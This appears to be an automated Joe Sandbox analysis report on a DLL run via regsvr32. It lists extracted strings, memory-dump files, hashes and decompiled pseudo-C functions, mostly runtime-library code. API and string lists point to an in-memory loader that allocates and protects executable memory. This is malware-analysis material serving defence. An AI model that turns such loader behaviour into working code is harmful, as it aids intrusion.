j, xrefs: 00007FFA0AE7637F
w, xrefs: 00007FFA0AE74EFF
m, xrefs: 00007FFA0AE75047
v, xrefs: 00007FFA0AE77097
W, xrefs: 00007FFA0AE789A7
P, xrefs: 00007FFA0AE77A27
M, xrefs: 00007FFA0AE75D1F
#, xrefs: 00007FFA0AE78297
j, xrefs: 00007FFA0AE74587
P, xrefs: 00007FFA0AE7516F
g, xrefs: 00007FFA0AE7504F
|, xrefs: 00007FFA0AE74CF7
e, xrefs: 00007FFA0AE74337
Q, xrefs: 00007FFA0AE76847
*, xrefs: 00007FFA0AE7773F
&, xrefs: 00007FFA0AE763A7
h, xrefs: 00007FFA0AE7839F
k, xrefs: 00007FFA0AE742CF
?, xrefs: 00007FFA0AE76AE7
;, xrefs: 00007FFA0AE757CF
a, xrefs: 00007FFA0AE756BF
$, xrefs: 00007FFA0AE790EF
., xrefs: 00007FFA0AE783CF
8, xrefs: 00007FFA0AE7599F
m, xrefs: 00007FFA0AE75C2F
(, xrefs: 00007FFA0AE76047
s, xrefs: 00007FFA0AE77ABF
f, xrefs: 00007FFA0AE790F7
i, xrefs: 00007FFA0AE74ECF
Z, xrefs: 00007FFA0AE742EF
n, xrefs: 00007FFA0AE78997
2, xrefs: 00007FFA0AE7823F
%, xrefs: 00007FFA0AE749A7
g, xrefs: 00007FFA0AE7517F
<, xrefs: 00007FFA0AE76617
\, xrefs: 00007FFA0AE7611F
0, xrefs: 00007FFA0AE749F7
$, xrefs: 00007FFA0AE78B77
E, xrefs: 00007FFA0AE74F8F
t, xrefs: 00007FFA0AE74E67
2, xrefs: 00007FFA0AE7653F
g, xrefs: 00007FFA0AE78447
^, xrefs: 00007FFA0AE74FB7
}, xrefs: 00007FFA0AE76907
3, xrefs: 00007FFA0AE772DF
n, xrefs: 00007FFA0AE7601F
, xrefs: 00007FFA0AE75C47
e, xrefs: 00007FFA0AE76B7F
., xrefs: 00007FFA0AE7918F
T, xrefs: 00007FFA0AE7464F
z, xrefs: 00007FFA0AE75887
%, xrefs: 00007FFA0AE74F97
:, xrefs: 00007FFA0AE77567
C, xrefs: 00007FFA0AE74537
x, xrefs: 00007FFA0AE789E7
Q, xrefs: 00007FFA0AE74A37
5, xrefs: 00007FFA0AE7474F
&, xrefs: 00007FFA0AE74E37
5, xrefs: 00007FFA0AE751F7
x, xrefs: 00007FFA0AE75737
l, xrefs: 00007FFA0AE7651F
U, xrefs: 00007FFA0AE75457
3, xrefs: 00007FFA0AE755EF
!, xrefs: 00007FFA0AE77497
d, xrefs: 00007FFA0AE766BF
%, xrefs: 00007FFA0AE76F27
&, xrefs: 00007FFA0AE781BF
2, xrefs: 00007FFA0AE7746F
m, xrefs: 00007FFA0AE7851F
q, xrefs: 00007FFA0AE7435F
/, xrefs: 00007FFA0AE756D7
k, xrefs: 00007FFA0AE764C7
*, xrefs: 00007FFA0AE78E3F
l, xrefs: 00007FFA0AE78A87
h, xrefs: 00007FFA0AE79097
b, xrefs: 00007FFA0AE74D17
8, xrefs: 00007FFA0AE75DA7
8, xrefs: 00007FFA0AE786D7
i, xrefs: 00007FFA0AE771D7
J, xrefs: 00007FFA0AE75127
V, xrefs: 00007FFA0AE783D7
5, xrefs: 00007FFA0AE76C7F
m, xrefs: 00007FFA0AE78A47
/, xrefs: 00007FFA0AE77E87
c, xrefs: 00007FFA0AE76F5F
j, xrefs: 00007FFA0AE75877
G, xrefs: 00007FFA0AE77787
\, xrefs: 00007FFA0AE78797
", xrefs: 00007FFA0AE779F7
Q, xrefs: 00007FFA0AE76B5F
\, xrefs: 00007FFA0AE76597
~, xrefs: 00007FFA0AE76FFF
", xrefs: 00007FFA0AE74A07
o, xrefs: 00007FFA0AE77AD7
(, xrefs: 00007FFA0AE75E5F
[, xrefs: 00007FFA0AE7736F
M, xrefs: 00007FFA0AE782BF
d, xrefs: 00007FFA0AE76C1F
{, xrefs: 00007FFA0AE768EF
M, xrefs: 00007FFA0AE759E7
J, xrefs: 00007FFA0AE753D7
@, xrefs: 00007FFA0AE774BF
K, xrefs: 00007FFA0AE768D7
., xrefs: 00007FFA0AE76B17
d, xrefs: 00007FFA0AE779FF
_, xrefs: 00007FFA0AE76D27
l, xrefs: 00007FFA0AE74B3F
!, xrefs: 00007FFA0AE755DF
%, xrefs: 00007FFA0AE75577
K, xrefs: 00007FFA0AE78267
H, xrefs: 00007FFA0AE75E97
E, xrefs: 00007FFA0AE76007
&, xrefs: 00007FFA0AE7419F
9, xrefs: 00007FFA0AE740FF
#, xrefs: 00007FFA0AE750DF
,, xrefs: 00007FFA0AE77B07
n, xrefs: 00007FFA0AE78EF7
n, xrefs: 00007FFA0AE7661F
%, xrefs: 00007FFA0AE78767
5, xrefs: 00007FFA0AE7783F
p, xrefs: 00007FFA0AE77B17
m, xrefs: 00007FFA0AE754D7
Z, xrefs: 00007FFA0AE7820F
W, xrefs: 00007FFA0AE76B97
U, xrefs: 00007FFA0AE7636F
n, xrefs: 00007FFA0AE74A2F
|, xrefs: 00007FFA0AE791BF
), xrefs: 00007FFA0AE77837
*, xrefs: 00007FFA0AE766AF
k, xrefs: 00007FFA0AE7878F
V, xrefs: 00007FFA0AE759BF
w, xrefs: 00007FFA0AE7691F
|, xrefs: 00007FFA0AE77E1F
;, xrefs: 00007FFA0AE75F37
j, xrefs: 00007FFA0AE75C27
w, xrefs: 00007FFA0AE76CDF
g, xrefs: 00007FFA0AE763DF
B, xrefs: 00007FFA0AE780BF
_, xrefs: 00007FFA0AE7513F
r, xrefs: 00007FFA0AE7501F
/, xrefs: 00007FFA0AE7917F
}, xrefs: 00007FFA0AE76867
t, xrefs: 00007FFA0AE781C7
1, xrefs: 00007FFA0AE788F7
K, xrefs: 00007FFA0AE779A7
N, xrefs: 00007FFA0AE77167
q, xrefs: 00007FFA0AE7613F
8, xrefs: 00007FFA0AE77867
&, xrefs: 00007FFA0AE788B7
p, xrefs: 00007FFA0AE75237
*, xrefs: 00007FFA0AE74B6F
^, xrefs: 00007FFA0AE79177
R, xrefs: 00007FFA0AE76407
t, xrefs: 00007FFA0AE7719F
U, xrefs: 00007FFA0AE777FF
v, xrefs: 00007FFA0AE7667F
F, xrefs: 00007FFA0AE77BBF
&, xrefs: 00007FFA0AE77CF7
, xrefs: 00007FFA0AE7901F
+, xrefs: 00007FFA0AE7844F
k, xrefs: 00007FFA0AE77F37
M, xrefs: 00007FFA0AE784B7
G, xrefs: 00007FFA0AE778FF
, xrefs: 00007FFA0AE76147
N, xrefs: 00007FFA0AE77877
t, xrefs: 00007FFA0AE75627
6, xrefs: 00007FFA0AE7427F
G, xrefs: 00007FFA0AE755BF
H, xrefs: 00007FFA0AE74877
3, xrefs: 00007FFA0AE75F8F
7, xrefs: 00007FFA0AE75B27
c, xrefs: 00007FFA0AE79117
&, xrefs: 00007FFA0AE7470F
', xrefs: 00007FFA0AE77B27
., xrefs: 00007FFA0AE752A7
4, xrefs: 00007FFA0AE76D5F
q, xrefs: 00007FFA0AE769F7
}, xrefs: 00007FFA0AE7625F

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID:
String ID: $ $ $ $ $ $ $ $ $ $ $ $!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$'$'$($($($($($($($($($($($($($($($)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$-$-$-$-$-$-$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$0$0$0$0$0$0$0$0$1$1$1$1$1$1$1$1$1$1$1$1$1$2$2$2$2$2$2$2$2$2$2$2$3$3$3$3$3$3$3$3$3$3$3$3$4$4$4$4$4$4$4$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$6$6$6$6$6$6$6$6$7$7$7$7$7$7$8$8$8$8$8$8$8$8$8$8$8$8$8$9$9$9$9$9$9$9$9$9$9$9$9$:$:$:$:$:$:$;$;$;$;$;$;$;$;$;$;$;$;$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$=$=$=$=$=$=$>$>$>$>$>$>$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$@$@$@$@$@$@$@$@$A$A$A$A$A$A$A$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$D$D$D$E$E$E$E$E$E$E$F$F$F$F$F$F$G$G$G$G$G$G$G$G$G$G$G$H$H$H$H$H$H$H$H$H$I$I$I$I$I$I$I$I$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$K$K$K$K$K$K$K$K$K$K$K$L$L$L$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$N$N$N$N$N$N$N$N$N$N$N$N$N$O$O$O$O$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$R$R$R$R$R$R$R$R$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$W$W$W$W$W$W$W$X$X$X$X$X$X$X$X$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$[$[$[$[$[$[$[$[$[$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$]$]$]$]$]$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$_$_$_$_$_$_$`$`$`$`$`$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$f$f$f$f$f$f$f$f$f$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$v$v$v$v$v$v$v$v$v$v$w$w$w$w$w$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z${${${${${${${${${${${${$|$|$|$|$|$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~
API String ID: 0-872547024
Opcode ID: c4862071faaed1940d300ef6226fb904299acbae747d38196158d4749b8d0ce4
Instruction ID: 7ba47381b56d5c863a8ecdf47f3a2d60e43c1ca8669da6d166ad3f0af0ec6a0d
Opcode Fuzzy Hash: c4862071faaed1940d300ef6226fb904299acbae747d38196158d4749b8d0ce4
Instruction Fuzzy Hash: D0A34E1250DBC1C9E332C23CB45878FAE9193A3319F484299D3E41AADBC7AE8155DF67

Uniqueness

Uniqueness Score: -1.00%

Function 00520000 Relevance: 53.5, APIs: 4, Strings: 26, Instructions: 953
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE ref: 00520344
VirtualAlloc.KERNELBASE ref: 0052038A
VirtualProtect.KERNELBASE ref: 0052085C
RtlAddFunctionTable.KERNEL32 ref: 005208E9

Strings

ncti, xrefs: 00520141
nf, xrefs: 00520127
ativ, xrefs: 0052010F
aryA, xrefs: 005200A5
rote, xrefs: 005200D5
ualA, xrefs: 005200B5
Libr, xrefs: 0052009D
RtlA, xrefs: 00520133
Virt, xrefs: 005200AD
Flus, xrefs: 005200E4
hIns, xrefs: 005200EB
eSys, xrefs: 00520117
Slee, xrefs: 00520084
tion, xrefs: 005200F9
Virt, xrefs: 005200C5
Cach, xrefs: 00520100
ct, xrefs: 005200DD
GetN, xrefs: 00520107
onTa, xrefs: 00520148
Load, xrefs: 00520095
temI, xrefs: 0052011F
truc, xrefs: 005200F2
ddFu, xrefs: 0052013A
ualP, xrefs: 005200CD
o, xrefs: 0052012E
lloc, xrefs: 005200BD

Memory Dump Source

Source File: 00000003.00000002.313695934.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_520000_regsvr32.jbxd

Similarity

API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
API String ID: 998211078-3605381585
Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction ID: 8f7edce312deb3d4624fdeb23874c7cc508f9bf249176fc88107ce454a73d8fb
Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction Fuzzy Hash: 39522730619B588BC719DF18E8856BABBF1FF55300F14562DE88BC7292DB34E442CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE64194 Relevance: 18.1, APIs: 12, Instructions: 133
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FFA7FFA0AE64194(void* __edx) {
				void* _t5;

				_t5 = __edx;
				if (_t5 == 0) goto 0xae641d5;
				if (_t5 == 0) goto 0xae641c9;
				if (_t5 == 0) goto 0xae641bc;
				if (__edx == 1) goto 0xae641b5;
				return 1;
			}

0x7ffa0ae64198
0x7ffa0ae6419a
0x7ffa0ae6419f
0x7ffa0ae641a4
0x7ffa0ae641a9
0x7ffa0ae641b4

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFA0AE641BC
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFA0AE64211
__scrt_fastfail.LIBCMT ref: 00007FFA0AE6422D
_RTC_Initialize.LIBCMT ref: 00007FFA0AE64245
__scrt_initialize_default_local_stdio_options.LIBCMT ref: 00007FFA0AE64267
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFA0AE64283
__scrt_release_startup_lock.LIBCMT ref: 00007FFA0AE642AE
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FFA0AE642CD

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
String ID:
API String ID: 3885183344-0
Opcode ID: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
Instruction ID: 74aa52f232267798931cfa9a1c73f310239fe63fd737cdb062f07e0146c03895
Opcode Fuzzy Hash: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
Instruction Fuzzy Hash: F3514633E0866386FA54BB75FA412B926A0AF577C0F98C8B5E94D472D7FE2CE4458700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE61580 Relevance: 10.6, APIs: 7, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E00007FFA7FFA0AE61580(long long __rcx, long long __rdx, long long _a8, void* _a16) {
				char _v16;
				char _v24;
				long long _v32;
				void* _v40;
				long long _v48;
				long long _v56;
				void* _t41;
				intOrPtr* _t49;
				void* _t77;

				_a16 = __rdx;
				_a8 = __rcx;
				_v32 = 0xfffffffe;
				_t49 = _a16;
				if (_a8 == _t49) goto 0xae61693;
				r8d = 0;
				E00007FFA7FFA0AE61910(1, _t49, _a8, _t77); // executed
				if (0 == 1) goto 0xae6160a;
				E00007FFA7FFA0AE61850(_a16);
				_v56 = _t49;
				E00007FFA7FFA0AE61850(_a8);
				if ((E00007FFA7FFA0AE62A50(_t49, _v56) & 0x000000ff) == 0) goto 0xae6160a;
				E00007FFA7FFA0AE61850(_a16);
				E00007FFA7FFA0AE61870(_t49, _a8, _t49);
				E00007FFA7FFA0AE61850(_a16);
				_v48 = _t49;
				E00007FFA7FFA0AE61850(_a8);
				if ((E00007FFA7FFA0AE62A50(_t49, _v48) & 0x000000ff) == 0) goto 0xae6167a;
				E00007FFA7FFA0AE61A20(_t49, _a16,  &_v24);
				_v40 = _t49;
				E00007FFA7FFA0AE61AA0(_t49, _a16,  &_v16);
				_t41 = E00007FFA7FFA0AE62A90(E00007FFA7FFA0AE62A50(_t49, _v48) & 0x000000ff, _t49, _a8,  *_t49,  *_v40);
				goto 0xae61693;
				E00007FFA7FFA0AE62B00(_t41, _a16);
				return E00007FFA7FFA0AE61F00(_t49, _a8, _t49);
			}

APIs

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE615C3
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE615D3
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE615F6

Part of subcall function 00007FFA0AE61870: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE61883

Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FFA0AE615E4

Part of subcall function 00007FFA0AE62A50: type_info::_name_internal_method.LIBCMTD ref: 00007FFA0AE62A68

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE6160F
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE6161F
Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FFA0AE61630

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::$EmptyQueue::StructuredWork$Affinity::operator!=Hardware$type_info::_name_internal_method
String ID:
API String ID: 1937815552-0
Opcode ID: 954c333ac2df008955a029cb14cb6a55c87b09566746746b3e5b77c9ccfd621f
Instruction ID: 0782810b96c7e9e9df1f8b4f03adfc4ef786aca83d2c9f40eb33717db1119418
Opcode Fuzzy Hash: 954c333ac2df008955a029cb14cb6a55c87b09566746746b3e5b77c9ccfd621f
Instruction Fuzzy Hash: DD311033A5DA5181DA51FB32F45147FA351EBC67C0F049A75FA8D937AAEE2CE4008B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE62600 Relevance: 9.1, APIs: 6, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E00007FFA7FFA0AE62600(long long __rcx, signed int __rdx, long long __r8, long long _a8, signed int _a16, long long _a24) {
				long long _v24;
				long long _v32;
				long long _v40;
				void* _v64;
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				long long _v104;
				char _v112;
				signed long long _v120;
				void* _t82;
				signed long long _t111;
				intOrPtr* _t113;
				intOrPtr* _t114;
				long long _t115;
				intOrPtr* _t116;
				intOrPtr* _t117;
				signed long long _t118;
				long long _t120;
				long long* _t121;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v24 = 0xfffffffe;
				_t111 = _a16 | 0x0000000f;
				_v120 = _t111;
				E00007FFA7FFA0AE62830(_t111, _a8);
				if (_t111 - _v120 >= 0) goto 0xae62659;
				_v120 = _a16;
				goto 0xae62736;
				_t113 = _v120;
				_v104 = _t113;
				E00007FFA7FFA0AE62150(_t113, _a8);
				_t114 =  *_t113;
				if (_t114 - _v104 > 0) goto 0xae62696;
				goto 0xae62736;
				E00007FFA7FFA0AE62150(_t114, _a8);
				_t115 =  *_t114;
				_v96 = _t115;
				E00007FFA7FFA0AE62830(_t115, _a8);
				_t116 = _t115 - _v96;
				_v88 = _t116;
				E00007FFA7FFA0AE62150(_t116, _a8);
				if ( *_t116 - _v88 > 0) goto 0xae62724;
				E00007FFA7FFA0AE62150(_t116, _a8);
				_t117 =  *_t116;
				_v80 = _t117;
				E00007FFA7FFA0AE62150(_t117, _a8);
				_t118 = _v80 +  *_t117;
				_v120 = _t118;
				goto 0xae62736;
				E00007FFA7FFA0AE62830(_t118, _a8);
				_v120 = _t118;
				_t120 = _v120 + 1;
				_v72 = _t120;
				E00007FFA7FFA0AE61850(_a8);
				E00007FFA7FFA0AE628E0(_t120, _v72); // executed
				_v64 = _t120;
				_t121 = _v64;
				_v112 = _t121;
				goto 0xae62771;
				if (_a24 <= 0) goto 0xae627b0;
				_t82 = E00007FFA7FFA0AE618F0(_t121, _a8);
				_v40 = _t121;
				E00007FFA7FFA0AE62C00(_t82, _v112);
				E00007FFA7FFA0AE611E0(_t121, _v40, _a24);
				r8d = 0;
				E00007FFA7FFA0AE61910(1, _t121, _a8, _a24);
				E00007FFA7FFA0AE62BC0(E00007FFA7FFA0AE62190(_a8), _t121);
				_v32 = _t121;
				E00007FFA7FFA0AE61850(_a8);
				E00007FFA7FFA0AE62C10(_t121, _t121, _v32,  &_v112);
				E00007FFA7FFA0AE62150(_t121, _a8);
				 *_t121 = _v120;
				return E00007FFA7FFA0AE623A0(_t121, _a8, _a24);
			}

APIs

Part of subcall function 00007FFA0AE62830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE6283E
Part of subcall function 00007FFA0AE62830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FFA0AE6284B

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE6274B
type_info::_name_internal_method.LIBCMTD ref: 00007FFA0AE6275B
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE62784
char_traits.LIBCPMTD ref: 00007FFA0AE627AB
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE627E4
construct.LIBCPMTD ref: 00007FFA0AE627F9

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::$Work$EmptyQueue::Structured$Base::$BridgeContextDispatchIdentityQueueSchedulerThrottlerchar_traitsconstructtype_info::_name_internal_method
String ID:
API String ID: 3284725307-0
Opcode ID: 64b4fcb419f68d04f760d19031f3ab5cdc5356945a98713b59a62d6a36c812a5
Instruction ID: 4a8507e9db286d2e59f439715c58d84f681c08169fa52b32f3a03fd9fa589af6
Opcode Fuzzy Hash: 64b4fcb419f68d04f760d19031f3ab5cdc5356945a98713b59a62d6a36c812a5
Instruction Fuzzy Hash: 8651FD32A1DB9585DA60EB61F4513AAA360FBCA7C0F408575EBCD87B5ADF3CD4008B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE61910 Relevance: 7.6, APIs: 5, Instructions: 59
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E00007FFA7FFA0AE61910(signed char __edx, intOrPtr* __rax, long long __rcx, long long __r8, long long _a8, signed char _a16, long long _a24) {
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				void* _t32;
				intOrPtr* _t47;
				long long* _t49;

				_a24 = __r8;
				_a16 = __edx;
				_a8 = __rcx;
				if ((_a16 & 0x000000ff) != 0) goto 0xae61930;
				goto 0xae619f1;
				E00007FFA7FFA0AE62150(__rax, _a8);
				if ( *((long long*)(__rax)) - 0x10 < 0) goto 0xae619f1;
				E00007FFA7FFA0AE62190(_a8);
				_t47 =  *((intOrPtr*)(__rax));
				_v40 = _t47;
				E00007FFA7FFA0AE62BC0(E00007FFA7FFA0AE62190(_a8), _t47);
				_v32 = _t47;
				E00007FFA7FFA0AE61850(_a8);
				_t32 = E00007FFA7FFA0AE62BD0(_t47, _v32);
				if (_a24 <= 0) goto 0xae619bd;
				E00007FFA7FFA0AE62C00(_t32, _v40);
				_v24 = _t47;
				E00007FFA7FFA0AE62190(_a8);
				E00007FFA7FFA0AE611E0(_t47, _v24, _a24);
				E00007FFA7FFA0AE62150(_t47, _a8);
				_t49 =  *_t47 + 1;
				_v16 = _t49;
				E00007FFA7FFA0AE61850(_a8);
				E00007FFA7FFA0AE62100(_t49, _v40, _v16); // executed
				E00007FFA7FFA0AE62150(_t49, _a8);
				 *_t49 = 0xf;
				return E00007FFA7FFA0AE623A0(_t49, _a8, _a24);
			}

APIs

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE61972
type_info::_name_internal_method.LIBCMTD ref: 00007FFA0AE61982
char_traits.LIBCPMTD ref: 00007FFA0AE619B8
